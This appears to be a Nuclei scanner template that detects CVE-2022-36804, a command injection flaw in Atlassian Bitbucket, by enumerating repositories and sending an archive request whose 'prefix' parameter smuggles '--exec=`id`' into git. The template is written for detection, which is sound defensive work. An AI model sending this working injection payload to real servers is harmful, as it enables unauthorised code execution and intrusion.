id: CVE-2022-36804 info: name: Atlassian Bitbucket Command Injection Vulnerability author: DhiyaneshDk,tess,sullo severity: high description: | Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. reference: - https://github.com/notdls/CVE-2022-36804 - https://nvd.nist.gov/vuln/detail/CVE-2022-36804 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804 - https://jira.atlassian.com/browse/BSERV-13438 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-36804 cwe-id: CWE-77 metadata: shodan-query: http.component:"BitBucket" tags: cve,cve2022,bitbucket,atlassian,kev variables: data: '{{rand_base(5)}}' requests: - raw: - | GET /rest/api/latest/repos HTTP/1.1 Host: {{Hostname}} - | GET /rest/api/latest/projects/{{key}}/repos/{{slug}}/archive?filename={{data}}&at={{data}}&path={{data}}&prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1 Host: {{Hostname}} iterate-all: true extractors: - type: json # type of the extractor part: body name: key json: - '.["values"] | .[] | .["project"] | .key' internal: true - type: json # type of the extractor part: body name: slug json: - '.["values"] | .[] | .slug' internal: true - type: regex group: 1 regex: - 'uid=.*\(([a-z]+)\):' stop-at-first-match: true matchers-condition: and matchers: - type: word words: - "com.atlassian.bitbucket.scm.CommandFailedException" - type: status status: - 500